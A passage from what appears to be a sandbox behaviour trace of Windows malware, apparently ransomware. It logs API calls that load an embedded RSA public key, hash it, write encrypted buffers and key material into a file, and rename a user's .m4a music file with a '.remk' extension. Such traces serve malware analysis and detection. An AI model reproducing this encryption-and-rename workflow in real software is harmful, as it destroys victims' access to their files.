nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x11856, lpOverlapped=0x0) returned 1 [0234.338] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0234.338] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.338] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.339] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0234.339] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.339] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.339] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.339] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0234.340] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.340] GetLastError () returned 0x0 [0234.340] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.340] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0234.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.340] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.340] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.340] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11860) returned 0x37c4278 [0234.340] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0234.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0234.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0234.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fd48 [0234.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0234.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bc1e8 [0234.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee718 [0234.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bc230 [0234.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee730 [0234.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee760 [0234.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee7c0 [0234.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee778 [0234.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0234.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0234.341] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0234.341] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee760 | out: hHeap=0x630000) returned 1 [0234.341] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee778 | out: hHeap=0x630000) returned 1 [0234.341] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee7c0 | out: hHeap=0x630000) returned 1 [0234.341] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0234.341] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee7c0 [0234.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0234.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee778 [0234.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0234.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee760 [0234.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0234.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x3192918 [0234.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0234.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0234.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0234.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0234.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0234.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0234.342] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.342] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee778 | out: hHeap=0x630000) returned 1 [0234.342] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0234.342] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee760 | out: hHeap=0x630000) returned 1 [0234.342] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0234.342] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.342] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee7c0 | out: hHeap=0x630000) returned 1 [0234.342] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0234.342] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0234.342] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0234.342] GetCurrentThreadId () returned 0x314 [0234.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0234.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c30a0 [0234.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0234.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0234.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0234.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0234.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0234.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.342] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.342] GetCurrentThreadId () returned 0x314 [0234.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.342] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0234.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.342] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.343] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.343] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0234.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0234.343] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0234.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0234.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0234.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee7c0 [0234.343] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0234.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0234.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0234.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0234.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0234.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0234.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0234.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee760 [0234.343] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0234.343] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0234.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0234.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0234.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0234.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee778 [0234.343] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0234.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0234.344] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0234.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee748 [0234.344] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0234.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee7d8 [0234.344] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0234.344] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0234.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee7a8 [0234.344] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee790 [0234.344] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0234.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee7f0 [0234.344] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee790 | out: hHeap=0x630000) returned 1 [0234.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee790 [0234.344] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee7a8 | out: hHeap=0x630000) returned 1 [0234.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0234.344] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0234.344] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0234.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0234.344] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee760 | out: hHeap=0x630000) returned 1 [0234.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee760 [0234.344] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x37c0db8 [0234.344] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee7c0 | out: hHeap=0x630000) returned 1 [0234.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0234.344] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee7f0 | out: hHeap=0x630000) returned 1 [0234.345] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37c0fc8 [0234.345] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0234.345] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x72aea0 [0234.345] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0234.345] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0234.345] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee760 | out: hHeap=0x630000) returned 1 [0234.345] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5b70 [0234.345] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0234.345] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0234.345] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0234.345] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0234.345] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0234.345] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0234.345] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0234.345] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0234.345] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0fc8 | out: hHeap=0x630000) returned 1 [0234.345] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.345] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0234.345] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0234.345] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee790 | out: hHeap=0x630000) returned 1 [0234.345] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0234.345] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee7d8 | out: hHeap=0x630000) returned 1 [0234.345] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0234.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee778 | out: hHeap=0x630000) returned 1 [0234.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee748 | out: hHeap=0x630000) returned 1 [0234.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0234.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0234.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0234.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee730 | out: hHeap=0x630000) returned 1 [0234.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc230 | out: hHeap=0x630000) returned 1 [0234.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0234.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0234.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0234.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0234.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0234.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0234.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0234.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0234.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0234.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.346] WriteFile (in: hFile=0x640, lpBuffer=0x37c4278*, nNumberOfBytesToWrite=0x11851, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c4278*, lpNumberOfBytesWritten=0x3adfb14*=0x11851, lpOverlapped=0x0) returned 1 [0234.347] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c4278 | out: hHeap=0x630000) returned 1 [0234.347] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x11856, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.347] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.347] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.347] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711900 [0234.347] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0234.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0234.347] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37c0db8 [0234.347] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.347] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711900 | out: hHeap=0x630000) returned 1 [0234.347] WriteFile (in: hFile=0x640, lpBuffer=0x37c0db8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37c0db8*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0234.347] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0234.347] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.347] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.347] CloseHandle (hObject=0x640) returned 1 [0234.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6420 [0234.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x37bc408 [0234.350] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6420 | out: hHeap=0x630000) returned 1 [0234.350] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\542fVbx-Nb5SSv6oh8A5.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\542fvbx-nb5ssv6oh8a5.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\542fVbx-Nb5SSv6oh8A5.m4a.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\542fvbx-nb5ssv6oh8a5.m4a.remk")) returned 1 [0234.351] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc408 | out: hHeap=0x630000) returned 1 [0234.351] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.351] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0234.352] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4610 | out: hHeap=0x630000) returned 1 [0234.352] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8df20e50, ftCreationTime.dwHighDateTime=0x1d5dce5, ftLastAccessTime.dwLowDateTime=0xf448e940, ftLastAccessTime.dwHighDateTime=0x1d5e12b, ftLastWriteTime.dwLowDateTime=0xf448e940, ftLastWriteTime.dwHighDateTime=0x1d5e12b, nFileSizeHigh=0x0, nFileSizeLow=0x485b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="91vVO4gMJf8R.m4a", cAlternateFileName="91VVO4~1.M4A")) returned 1 [0234.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x31a4610 [0234.352] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.352] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\91vVO4gMJf8R.m4a") returned=".m4a" [0234.352] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS 